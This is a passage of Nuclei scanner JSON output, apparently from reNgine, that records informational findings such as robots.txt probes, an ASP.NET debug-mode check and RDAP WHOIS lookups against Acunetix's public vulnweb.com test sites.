Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\nUser-agent: *\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:34.512403288Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' 'http://testasp.vulnweb.com/robots.txt'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/robots-txt-endpoint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/robots-txt-endpoint\",\"template-id\":\"robots-txt-endpoint\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/robots-txt-endpoint.yaml\",\"info\":{\"name\":\"robots.txt endpoint prober\",\"author\":[\"caspergn\",\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":2}},\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com/robots.txt\",\"request\":\"GET /robots.txt HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.22000\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 13\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: text/plain\\r\\nDate: Wed, 13 Nov 2024 02:43:30 GMT\\r\\nEtag: \\\"b0b05ac194d51:0\\\"\\r\\nLast-Modified: Mon, 06 May 2019 12:46:42 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\nUser-agent: *\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:34.521772224Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.22000' 'http://testaspnet.vulnweb.com/robots.txt'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/robots-txt-endpoint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/robots-txt-endpoint\",\"template-id\":\"robots-txt-endpoint\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/robots-txt-endpoint.yaml\",\"info\":{\"name\":\"robots.txt endpoint prober\",\"author\":[\"caspergn\",\"pdteam\"],\"tags\":[\"miscellaneous\",\"misc\",\"generic\"],\"severity\":\"info\",\"metadata\":{\"max-request\":2}},\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/robots.txt\",\"request\":\"GET /robots.txt HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 13\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: text/plain\\r\\nDate: Wed, 13 Nov 2024 02:43:30 GMT\\r\\nEtag: \\\"3629faa394d51:0\\\"\\r\\nLast-Modified: Mon, 06 May 2019 12:45:52 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\nUser-agent: *\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:34.560425525Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' 'http://testasp.vulnweb.com/robots.txt'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/aspx-debug-mode.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/aspx-debug-mode\",\"template-id\":\"aspx-debug-mode\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/aspx-debug-mode.yaml\",\"info\":{\"name\":\"ASP.NET Debugging Enabled\",\"author\":[\"dhiyaneshdk\"],\"tags\":[\"debug\",\"misconfig\"],\"reference\":[\"https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com/Foobar-debug.aspx\",\"request\":\"DEBUG /Foobar-debug.aspx HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.81\\r\\nConnection: close\\r\\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\nCommand: stop-debug\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:43:40 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\nOK\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:43:44.527761675Z\",\"curl-command\":\"curl -X 'DEBUG' -d '' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Command: stop-debug' -H 'Content-Length: 2' -H 'Host: testaspnet.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.81' 'http://testaspnet.vulnweb.com/Foobar-debug.aspx'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/rdap-whois.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/rdap-whois\",\"template-id\":\"rdap-whois\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/rdap-whois.yaml\",\"info\":{\"name\":\"RDAP WHOIS\",\"author\":[\"ricardomaia\",\"sttlr\"],\"tags\":[\"miscellaneous\",\"whois\",\"rdap\",\"osint\",\"misc\"],\"description\":\"RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol\\nin queries for information about Internet resource records such as domain names, IP addresses, and ASNs.\\n\",\"reference\":[\"https://about.rdap.org/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1,\"verified\":true},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"extractor-name\":\"nameServers\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"https://rdap.verisign.com/com/v1/domain/vulnweb.com\",\"extracted-results\":[\"NS1.EURODNS.COM\",\"NS2.EURODNS.COM\",\"NS3.EURODNS.COM\",\"NS4.EURODNS.COM\"],\"request\":\"GET /domain/vulnweb.com HTTP/1.1\\r\\nHost: www.rdap.net\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nContent-Length: 2276\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: application/rdap+json\\r\\nStrict-Transport-Security: max-age=15768000; includeSubDomains; preload\\r\\n\\r\\n{\\\"objectClassName\\\":\\\"domain\\\",\\\"handle\\\":\\\"1602006391_DOMAIN_COM-VRSN\\\",\\\"ldhName\\\":\\\"VULNWEB.COM\\\",\\\"links\\\":[{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"self\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"},{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"related\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"}],\\\"status\\\":[\\\"client transfer prohibited\\\"],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"handle\\\":\\\"1052\\\",\\\"roles\\\":[\\\"registrar\\\"],\\\"publicIds\\\":[{\\\"type\\\":\\\"IANA Registrar ID\\\",\\\"identifier\\\":\\\"1052\\\"}],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"EuroDNS S.A.\\\"]]],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"roles\\\":[\\\"abuse\\\"],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"\\\"],[\\\"tel\\\",{\\\"type\\\":\\\"voice\\\"},\\\"uri\\\",\\\"tel:+352.27220150\\\"],[\\\"email\\\",{},\\\"text\\\",\\\"legalservices@eurodns.com\\\"]]]}]}],\\\"events\\\":[{\\\"eventAction\\\":\\\"registration\\\",\\\"eventDate\\\":\\\"2010-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"expiration\\\",\\\"eventDate\\\":\\\"2025-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"last changed\\\",\\\"eventDate\\\":\\\"2023-05-26T07:56:15Z\\\"},{\\\"eventAction\\\":\\\"last update of RDAP database\\\",\\\"eventDate\\\":\\\"2024-11-13T02:43:30Z\\\"}],\\\"secureDNS\\\":{\\\"delegationSigned\\\":false},\\\"nameservers\\\":[{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS1.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS2.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS3.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS4.EURODNS.COM\\\"}],\\\"rdapConformance\\\":[\\\"rdap_level_0\\\",\\\"icann_rdap_technical_implementation_guide_0\\\",\\\"icann_rdap_response_profile_0\\\"],\\\"notices\\\":[{\\\"title\\\":\\\"Terms of Use\\\",\\\"description\\\":[\\\"Service subject to Terms of Use.\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/www.verisign.com\\\\/domain-names\\\\/registration-data-access-protocol\\\\/terms-service\\\\/index.xhtml\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"Status Codes\\\",\\\"description\\\":[\\\"For more information on domain status codes, please visit https:\\\\/\\\\/icann.org\\\\/epp\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/epp\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"RDDS Inaccuracy Complaint Form\\\",\\\"description\\\":[\\\"URL of the ICANN RDDS Inaccuracy Complaint Form: https:\\\\/\\\\/icann.org\\\\/wicf\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/wicf\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]}]}\",\"ip\":\"64.176.191.126\",\"timestamp\":\"2024-11-13T02:43:46.423658587Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' 'https://www.rdap.net/domain/vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/rdap-whois.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/rdap-whois\",\"template-id\":\"rdap-whois\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/rdap-whois.yaml\",\"info\":{\"name\":\"RDAP WHOIS\",\"author\":[\"ricardomaia\",\"sttlr\"],\"tags\":[\"miscellaneous\",\"whois\",\"rdap\",\"osint\",\"misc\"],\"description\":\"RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol\\nin queries for information about Internet resource records such as domain names, IP addresses, and ASNs.\\n\",\"reference\":[\"https://about.rdap.org/\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"extractor-name\":\"secureDNS\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"https://rdap.verisign.com/com/v1/domain/vulnweb.com\",\"extracted-results\":[\"false\"],\"request\":\"GET /domain/vulnweb.com HTTP/1.1\\r\\nHost: www.rdap.net\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nContent-Length: 2276\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: application/rdap+json\\r\\nStrict-Transport-Security: max-age=15768000; includeSubDomains; preload\\r\\n\\r\\n{\\\"objectClassName\\\":\\\"domain\\\",\\\"handle\\\":\\\"1602006391_DOMAIN_COM-VRSN\\\",\\\"ldhName\\\":\\\"VULNWEB.COM\\\",\\\"links\\\":[{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"self\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"},{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"related\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"}],\\\"status\\\":[\\\"client transfer prohibited\\\"],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"handle\\\":\\\"1052\\\",\\\"roles\\\":[\\\"registrar\\\"],\\\"publicIds\\\":[{\\\"type\\\":\\\"IANA Registrar ID\\\",\\\"identifier\\\":\\\"1052\\\"}],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"EuroDNS S.A.\\\"]]],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"roles\\\":[\\\"abuse\\\"],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"\\\"],[\\\"tel\\\",{\\\"type\\\":\\\"voice\\\"},\\\"uri\\\",\\\"tel:+352.27220150\\\"],[\\\"email\\\",{},\\\"text\\\",\\\"legalservices@eurodns.com\\\"]]]}]}],\\\"events\\\":[{\\\"eventAction\\\":\\\"registration\\\",\\\"eventDate\\\":\\\"2010-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"expiration\\\",\\\"eventDate\\\":\\\"2025-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"last changed\\\",\\\"eventDate\\\":\\\"2023-05-26T07:56:15Z\\\"},{\\\"eventAction\\\":\\\"last update of RDAP database\\\",\\\"eventDate\\\":\\\"2024-11-13T02:43:30Z\\\"}],\\\"secureDNS\\\":{\\\"delegationSigned\\\":false},\\\"nameservers\\\":[{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS1.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS2.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS3.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS4.EURODNS.COM\\\"}],\\\"rdapConformance\\\":[\\\"rdap_level_0\\\",\\\"icann_rdap_technical_implementation_guide_0\\\",\\\"icann_rdap_response_profile_0\\\"],\\\"notices\\\":[{\\\"title\\\":\\\"Terms of Use\\\",\\\"description\\\":[\\\"Service subject to Terms of Use.\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/www.verisign.com\\\\/domain-names\\\\/registration-data-access-protocol\\\\/terms-service\\\\/index.xhtml\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"Status Codes\\\",\\\"description\\\":[\\\"For more information on domain status codes, please visit https:\\\\/\\\\/icann.org\\\\/epp\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/epp\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"RDDS Inaccuracy Complaint Form\\\",\\\"description\\\":[\\\"URL of the ICANN RDDS Inaccuracy Complaint Form: https:\\\\/\\\\/icann.org\\\\/wicf\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/wicf\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]}]}\",\"ip\":\"64.176.191.126\",\"timestamp\":\"2024-11-13T02:43:46.423737074Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' 'https://www.rdap.net/domain/vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/rdap-whois.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/rdap-whois\",\"template-id\":\"rdap-whois\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/rdap-whois.yaml\",\"info\":{\"name\":\"RDAP WHOIS\",\"author\":[\"ricardomaia\",\"sttlr\"],\"tags\":[\"miscellaneous\",\"whois\",\"rdap\",\"osint\",\"misc\"],\"description\":\"RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol\\nin queries for information about Internet resource records such as domain names, IP addresses, and ASNs.\\n\",\"reference\":[\"https://about.rdap.org/\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"extractor-name\":\"status\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"https://rdap.verisign.com/com/v1/domain/vulnweb.com\",\"extracted-results\":[\"client transfer prohibited\"],\"request\":\"GET /domain/vulnweb.com HTTP/1.1\\r\\nHost: www.rdap.net\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nContent-Length: 2276\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: application/rdap+json\\r\\nStrict-Transport-Security: max-age=15768000; includeSubDomains; preload\\r\\n\\r\\n{\\\"objectClassName\\\":\\\"domain\\\",\\\"handle\\\":\\\"1602006391_DOMAIN_COM-VRSN\\\",\\\"ldhName\\\":\\\"VULNWEB.COM\\\",\\\"links\\\":[{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"self\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"},{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"related\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"}],\\\"status\\\":[\\\"client transfer prohibited\\\"],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"handle\\\":\\\"1052\\\",\\\"roles\\\":[\\\"registrar\\\"],\\\"publicIds\\\":[{\\\"type\\\":\\\"IANA Registrar ID\\\",\\\"identifier\\\":\\\"1052\\\"}],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"EuroDNS S.A.\\\"]]],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"roles\\\":[\\\"abuse\\\"],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"\\\"],[\\\"tel\\\",{\\\"type\\\":\\\"voice\\\"},\\\"uri\\\",\\\"tel:+352.27220150\\\"],[\\\"email\\\",{},\\\"text\\\",\\\"legalservices@eurodns.com\\\"]]]}]}],\\\"events\\\":[{\\\"eventAction\\\":\\\"registration\\\",\\\"eventDate\\\":\\\"2010-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"expiration\\\",\\\"eventDate\\\":\\\"2025-06-14T07:50:29Z\\\"},{\\\"eventAction\\\":\\\"last changed\\\",\\\"eventDate\\\":\\\"2023-05-26T07:56:15Z\\\"},{\\\"eventAction\\\":\\\"last update of RDAP database\\\",\\\"eventDate\\\":\\\"2024-11-13T02:43:30Z\\\"}],\\\"secureDNS\\\":{\\\"delegationSigned\\\":false},\\\"nameservers\\\":[{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS1.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS2.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS3.EURODNS.COM\\\"},{\\\"objectClassName\\\":\\\"nameserver\\\",\\\"ldhName\\\":\\\"NS4.EURODNS.COM\\\"}],\\\"rdapConformance\\\":[\\\"rdap_level_0\\\",\\\"icann_rdap_technical_implementation_guide_0\\\",\\\"icann_rdap_response_profile_0\\\"],\\\"notices\\\":[{\\\"title\\\":\\\"Terms of Use\\\",\\\"description\\\":[\\\"Service subject to Terms of Use.\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/www.verisign.com\\\\/domain-names\\\\/registration-data-access-protocol\\\\/terms-service\\\\/index.xhtml\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"Status Codes\\\",\\\"description\\\":[\\\"For more information on domain status codes, please visit https:\\\\/\\\\/icann.org\\\\/epp\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/epp\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]},{\\\"title\\\":\\\"RDDS Inaccuracy Complaint Form\\\",\\\"description\\\":[\\\"URL of the ICANN RDDS Inaccuracy Complaint Form: https:\\\\/\\\\/icann.org\\\\/wicf\\\"],\\\"links\\\":[{\\\"href\\\":\\\"https:\\\\/\\\\/icann.org\\\\/wicf\\\",\\\"type\\\":\\\"text\\\\/html\\\"}]}]}\",\"ip\":\"64.176.191.126\",\"timestamp\":\"2024-11-13T02:43:46.423768056Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' 'https://www.rdap.net/domain/vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/rdap-whois.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/rdap-whois\",\"template-id\":\"rdap-whois\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/rdap-whois.yaml\",\"info\":{\"name\":\"RDAP WHOIS\",\"author\":[\"ricardomaia\",\"sttlr\"],\"tags\":[\"miscellaneous\",\"whois\",\"rdap\",\"osint\",\"misc\"],\"description\":\"RDAP (Registration Data Access Protocol) is a standard defined by the IETF to replace the whois protocol\\nin queries for information about Internet resource records such as domain names, IP addresses, and ASNs.\\n\",\"reference\":[\"https://about.rdap.org/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1,\"verified\":true},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"}},\"extractor-name\":\"registrationDate\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"https://rdap.verisign.com/com/v1/domain/vulnweb.com\",\"extracted-results\":[\"2010-06-14T07:50:29Z\"],\"request\":\"GET /domain/vulnweb.com HTTP/1.1\\r\\nHost: www.rdap.net\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nContent-Length: 2276\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: application/rdap+json\\r\\nStrict-Transport-Security: max-age=15768000; includeSubDomains; preload\\r\\n\\r\\n{\\\"objectClassName\\\":\\\"domain\\\",\\\"handle\\\":\\\"1602006391_DOMAIN_COM-VRSN\\\",\\\"ldhName\\\":\\\"VULNWEB.COM\\\",\\\"links\\\":[{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"self\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.verisign.com\\\\/com\\\\/v1\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"},{\\\"value\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"rel\\\":\\\"related\\\",\\\"href\\\":\\\"https:\\\\/\\\\/rdap.eurodns.com\\\\/domain\\\\/VULNWEB.COM\\\",\\\"type\\\":\\\"application\\\\/rdap+json\\\"}],\\\"status\\\":[\\\"client transfer prohibited\\\"],\\\"entities\\\":[{\\\"objectClassName\\\":\\\"entity\\\",\\\"handle\\\":\\\"1052\\\",\\\"roles\\\":[\\\"registrar\\\"],\\\"publicIds\\\":[{\\\"type\\\":\\\"IANA Registrar ID\\\",\\\"identifier\\\":\\\"1052\\\"}],\\\"vcardArray\\\":[\\\"vcard\\\",[[\\\"version\\\",{},\\\"text\\\",\\\"4.0\\\"],[\\\"fn\\\",{},\\\"text\\\",\\\"EuroDNS 